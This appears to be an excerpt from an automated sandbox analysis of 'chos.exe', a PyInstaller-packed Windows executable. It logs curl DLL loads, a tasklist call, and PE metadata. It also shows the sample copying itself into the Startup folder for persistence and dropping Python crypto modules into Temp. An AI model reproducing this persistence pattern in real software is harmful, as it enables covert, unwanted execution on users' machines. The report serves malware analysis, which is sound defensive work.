Source: C:\Windows\System32\curl.exe	Section loaded: schannel.dll
Source: C:\Windows\System32\curl.exe	Section loaded: mskeyprotect.dll
Source: C:\Windows\System32\curl.exe	Section loaded: ntasn1.dll
Source: C:\Windows\System32\curl.exe	Section loaded: ncrypt.dll
Source: C:\Windows\System32\curl.exe	Section loaded: ncryptsslp.dll
Source: C:\Windows\System32\curl.exe	Section loaded: secur32.dll
Source: C:\Windows\System32\curl.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\curl.exe	Section loaded: iphlpapi.dll
Source: C:\Windows\System32\curl.exe	Section loaded: cryptsp.dll
Source: C:\Windows\System32\curl.exe	Section loaded: rsaenh.dll
Source: C:\Windows\System32\curl.exe	Section loaded: cryptbase.dll
Source: C:\Windows\System32\curl.exe	Section loaded: mswsock.dll
Source: C:\Windows\System32\curl.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\curl.exe	Section loaded: dnsapi.dll
Source: C:\Windows\System32\curl.exe	Section loaded: rasadhlp.dll
Source: C:\Windows\System32\curl.exe	Section loaded: fwpuclnt.dll
Source: C:\Windows\System32\curl.exe	Section loaded: schannel.dll
Source: C:\Windows\System32\curl.exe	Section loaded: mskeyprotect.dll
Source: C:\Windows\System32\curl.exe	Section loaded: ntasn1.dll
Source: C:\Windows\System32\curl.exe	Section loaded: ncrypt.dll
Source: C:\Windows\System32\curl.exe	Section loaded: ncryptsslp.dll
Source: C:\Windows\System32\curl.exe	Section loaded: secur32.dll
Source: C:\Windows\System32\curl.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\curl.exe	Section loaded: iphlpapi.dll
Source: C:\Windows\System32\curl.exe	Section loaded: cryptsp.dll
Source: C:\Windows\System32\curl.exe	Section loaded: rsaenh.dll
Source: C:\Windows\System32\curl.exe	Section loaded: cryptbase.dll
Source: C:\Windows\System32\curl.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\curl.exe	Section loaded: secur32.dll
Source: C:\Windows\System32\curl.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\curl.exe	Section loaded: iphlpapi.dll
Source: C:\Windows\System32\curl.exe	Section loaded: cryptsp.dll
Source: C:\Windows\System32\curl.exe	Section loaded: rsaenh.dll
Source: C:\Windows\System32\curl.exe	Section loaded: cryptbase.dll
Source: C:\Windows\System32\curl.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\curl.exe	Section loaded: secur32.dll
Source: C:\Windows\System32\curl.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\curl.exe	Section loaded: iphlpapi.dll
Source: C:\Windows\System32\curl.exe	Section loaded: cryptsp.dll
Source: C:\Windows\System32\curl.exe	Section loaded: rsaenh.dll
Source: C:\Windows\System32\curl.exe	Section loaded: cryptbase.dll
Source: C:\Windows\System32\curl.exe	Section loaded: kernel.appcore.dll

Source: C:\Windows\System32\tasklist.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}\InprocServer32

Jump to behavior

Source: C:\Windows\System32\cmd.exe

Process created: C:\Windows\System32\tasklist.exe tasklist

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: chos.exe

Static PE information: Image base 0x140000000 > 0x60000000

Source: chos.exe

Static file information: File size 17703403 > 1048576

Source: chos.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: chos.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: chos.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: chos.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: chos.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: chos.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT

Source: chos.exe

Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE

Source: chos.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Source:	Binary string: D:\a\_work\1\s\binaries\amd64ret\bin\amd64\\vcruntime140_1.amd64.pdb source: chos.exe, 00000000.00000003.1426590138.0000018B76862000.00000004.00000020.00020000.00000000.sdmp, chos.exe, 0000000A.00000003.1641456665.00000243B8849000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: D:\a\1\b\bin\amd64\_hashlib.pdb source: chos.exe, 00000000.00000003.1427464931.0000018B76862000.00000004.00000020.00020000.00000000.sdmp, chos.exe, 0000000A.00000003.1642650213.00000243B8843000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: D:\a\1\b\bin\amd64\_lzma.pdbNN source: chos.exe, 00000000.00000003.1427624541.0000018B76862000.00000004.00000020.00020000.00000000.sdmp, chos.exe, 0000000A.00000003.1642801872.00000243B8849000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: D:\a\1\b\bin\amd64\_asyncio.pdb source: chos.exe, 00000000.00000003.1426703249.0000018B76862000.00000004.00000020.00020000.00000000.sdmp, chos.exe, 0000000A.00000003.1641621400.00000243B8849000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: D:\a\1\b\bin\amd64\_uuid.pdb source: chos.exe, 00000000.00000003.1428914450.0000018B76862000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: D:\a\1\b\bin\amd64\_wmi.pdb(('GCTL source: chos.exe, 00000000.00000003.1429055969.0000018B76862000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: D:\a\1\b\bin\amd64\_queue.pdb source: chos.exe, 00000000.00000003.1428323610.0000018B76862000.00000004.00000020.00020000.00000000.sdmp, chos.exe, 0000000A.00000003.1643743903.00000243B8849000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: D:\a\1\b\bin\amd64\_overlapped.pdb source: chos.exe, 00000000.00000003.1428168179.0000018B76862000.00000004.00000020.00020000.00000000.sdmp, chos.exe, 0000000A.00000003.1643387769.00000243B8849000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: D:\a\1\b\bin\amd64\_lzma.pdb source: chos.exe, 00000000.00000003.1427624541.0000018B76862000.00000004.00000020.00020000.00000000.sdmp, chos.exe, 0000000A.00000003.1642801872.00000243B8849000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: D:\a\1\b\bin\amd64\_bz2.pdb source: chos.exe, 00000000.00000003.1426840290.0000018B76862000.00000004.00000020.00020000.00000000.sdmp, chos.exe, 0000000A.00000003.1641792858.00000243B8849000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: D:\a\1\b\bin\amd64\_wmi.pdb source: chos.exe, 00000000.00000003.1429055969.0000018B76862000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: D:\a\_work\1\s\binaries\amd64ret\bin\amd64\\vcruntime140.amd64.pdb source: chos.exe, 00000000.00000003.1426422530.0000018B76862000.00000004.00000020.00020000.00000000.sdmp, chos.exe, 0000000A.00000003.1641240155.00000243B8849000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: D:\a\_work\1\s\binaries\amd64ret\bin\amd64\\vcruntime140.amd64.pdbGCTL source: chos.exe, 00000000.00000003.1426422530.0000018B76862000.00000004.00000020.00020000.00000000.sdmp, chos.exe, 0000000A.00000003.1641240155.00000243B8849000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: D:\a\1\b\bin\amd64\_socket.pdb source: chos.exe, 00000000.00000003.1428399209.0000018B76862000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: D:\a\1\b\bin\amd64\_multiprocessing.pdb source: chos.exe, 00000000.00000003.1428077354.0000018B76862000.00000004.00000020.00020000.00000000.sdmp, chos.exe, 0000000A.00000003.1643035111.00000243B8849000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: D:\a\_work\1\s\binaries\amd64ret\bin\amd64\\vcruntime140_1.amd64.pdbGCTL source: chos.exe, 00000000.00000003.1426590138.0000018B76862000.00000004.00000020.00020000.00000000.sdmp, chos.exe, 0000000A.00000003.1641456665.00000243B8849000.00000004.00000020.00020000.00000000.sdmp

Source: chos.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
Source: chos.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
Source: chos.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
Source: chos.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
Source: chos.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

Source: VCRUNTIME140.dll.0.dr

Static PE information: 0x78BDDED1 [Sat Mar 11 17:01:05 2034 UTC]

Source: VCRUNTIME140.dll.0.dr	Static PE information: section name: fothk
Source: VCRUNTIME140.dll.0.dr	Static PE information: section name: _RDATA
Source: libcrypto-3.dll.0.dr	Static PE information: section name: .00cfg
Source: libssl-3.dll.0.dr	Static PE information: section name: .00cfg
Source: python313.dll.0.dr	Static PE information: section name: PyRuntim
Source: VCRUNTIME140.dll.10.dr	Static PE information: section name: fothk
Source: VCRUNTIME140.dll.10.dr	Static PE information: section name: _RDATA
Source: libcrypto-3.dll.10.dr	Static PE information: section name: .00cfg
Source: libssl-3.dll.10.dr	Static PE information: section name: .00cfg
Source: python313.dll.10.dr	Static PE information: section name: PyRuntim

Persistence and Installation Behavior

Found pyInstaller with non standard icon

Source: C:\Users\user\Desktop\chos.exe	Process created: "C:\Users\user\Desktop\chos.exe"
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chos.exe	Process created: "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chos.exe"

Source: C:\Users\user\Desktop\chos.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI74682\Crypto\Hash\_BLAKE2b.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\chos.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI74682\Crypto\Cipher\_raw_arc2.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chos.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI98882\charset_normalizer\md.cp313-win_amd64.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\chos.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI74682\Crypto\Cipher\_raw_cbc.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\chos.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI74682\libffi-8.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chos.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI98882\Crypto\Hash\_SHA1.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\chos.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI74682\libcrypto-3.dll	Jump to dropped file
Source: C:\Users\user\Desktop\chos.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI74682\_ctypes.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\chos.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI74682\_ssl.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chos.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI98882\Crypto\Hash\_MD4.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\chos.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI74682\Crypto\Hash\_ghash_portable.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chos.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI98882\libffi-8.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chos.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI98882\Crypto\Hash\_ghash_portable.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\chos.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI74682\Crypto\Hash\_MD5.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\chos.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI74682\_lzma.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\chos.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI74682\charset_normalizer\md.cp313-win_amd64.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chos.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI98882\Crypto\Math\_modexp.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chos.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI98882\python313.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chos.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI98882\_decimal.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chos.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI98882\_cffi_backend.cp313-win_amd64.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\chos.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI74682\Crypto\Hash\_SHA256.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chos.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI98882\sqlite3.dll	Jump to dropped file
Source: C:\Users\user\Desktop\chos.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI74682\_overlapped.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chos.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI98882\Crypto\Cipher\_ARC4.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chos.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI98882\Crypto\Cipher\_Salsa20.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chos.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI98882\Crypto\Hash\_SHA512.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\chos.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI74682\Crypto\Hash\_SHA384.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\chos.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI74682\_decimal.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chos.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI98882\Crypto\PublicKey\_curve25519.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\chos.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI74682\Crypto\Cipher\_raw_ctr.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\chos.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI74682\Crypto\Cipher\_raw_cfb.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chos.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI98882\Crypto\PublicKey\_ed25519.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\chos.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI74682\Crypto\Protocol\_scrypt.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\chos.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chos.exe	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chos.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI98882\libcrypto-3.dll	Jump to dropped file
Source: C:\Users\user\Desktop\chos.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI74682\Crypto\Cipher\_raw_cast.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chos.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI98882\Crypto\PublicKey\_ed448.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chos.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI98882\_bz2.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\chos.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI74682\Crypto\PublicKey\_ec_ws.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chos.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI98882\_overlapped.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\chos.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI74682\_uuid.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\chos.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI74682\Crypto\Cipher\_raw_des.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\chos.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI74682\select.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\chos.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI74682\Crypto\Hash\_SHA224.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chos.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI98882\_uuid.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\chos.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI74682\python313.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chos.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI98882\Crypto\Util\_strxor.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\chos.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI74682\pyexpat.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\chos.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI74682\cryptography\hazmat\bindings\_rust.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\chos.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI74682\Crypto\Cipher\_raw_ecb.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\chos.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI74682\libssl-3.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chos.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI98882\Crypto\Cipher\_raw_cfb.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chos.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI98882\Crypto\Hash\_BLAKE2b.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\chos.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI74682\Crypto\Hash\_RIPEMD160.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\chos.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI74682\Crypto\Hash\_MD2.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\chos.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI74682\Crypto\Cipher\_raw_blowfish.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chos.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI98882\Crypto\Cipher\_raw_blowfish.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\chos.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI74682\Crypto\Cipher\_raw_aesni.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chos.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI98882\Crypto\Cipher\_raw_aesni.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chos.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI98882\Crypto\Hash\_ghash_clmul.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\chos.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI74682\Crypto\Hash\_ghash_clmul.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\chos.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI74682\Crypto\PublicKey\_curve25519.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chos.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI98882\Crypto\Cipher\_raw_ofb.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\chos.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI74682\Crypto\PublicKey\_ed448.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\chos.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI74682\VCRUNTIME140_1.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chos.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI98882\Crypto\Cipher\_raw_ocb.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\chos.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI74682\Crypto\Cipher\_raw_eksblowfish.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chos.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI98882\_asyncio.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chos.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI98882\Crypto\PublicKey\_ec_ws.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\chos.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI74682\Crypto\Hash\_keccak.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chos.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI98882\_ctypes.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chos.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI98882\_multiprocessing.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chos.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI98882\Crypto\Cipher\_raw_aes.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chos.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI98882\Crypto\Hash\_MD5.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chos.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI98882\VCRUNTIME140.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chos.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI98882\_hashlib.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\chos.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI74682\Crypto\Hash\_MD4.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\chos.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI74682\Crypto\Cipher\_pkcs1_decode.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chos.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI98882\Crypto\Hash\_SHA384.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\chos.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI74682\_queue.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chos.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI98882\Crypto\Hash\_poly1305.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\chos.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI74682\Crypto\Cipher\_Salsa20.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chos.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI98882\Crypto\PublicKey\_curve448.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\chos.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI74682\_asyncio.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\chos.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI74682\Crypto\Hash\_SHA512.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chos.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI98882\Crypto\Cipher\_pkcs1_decode.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chos.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI98882\_wmi.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chos.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI98882\Crypto\Cipher\_raw_eksblowfish.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chos.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI98882\Crypto\Cipher\_chacha20.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\chos.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI74682\Crypto\Cipher\_raw_ofb.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\chos.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI74682\_socket.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\chos.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI74682\unicodedata.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chos.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI98882\Crypto\Hash\_BLAKE2s.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\chos.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI74682\charset_normalizer\md__mypyc.cp313-win_amd64.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\chos.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI74682\Crypto\Hash\_BLAKE2s.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\chos.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI74682\_wmi.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\chos.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI74682\Crypto\Cipher\_ARC4.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chos.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI98882\libssl-3.dll	Jump to dropped file
Source: C:\Users\user\Desktop\chos.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI74682\Crypto\PublicKey\_curve448.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\chos.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI74682\python3.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chos.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI98882\Crypto\Hash\_SHA256.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chos.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI98882\unicodedata.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\chos.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI74682\Crypto\Hash\_poly1305.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chos.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI98882\cryptography\hazmat\bindings\_rust.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chos.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI98882\VCRUNTIME140_1.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chos.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI98882\Crypto\Hash\_SHA224.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\chos.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI74682\_hashlib.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chos.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI98882\charset_normalizer\md__mypyc.cp313-win_amd64.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\chos.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI74682\Crypto\Cipher\_raw_des3.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chos.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI98882\select.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\chos.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI74682\Crypto\Util\_cpuid_c.pyd	Jump to dropped file
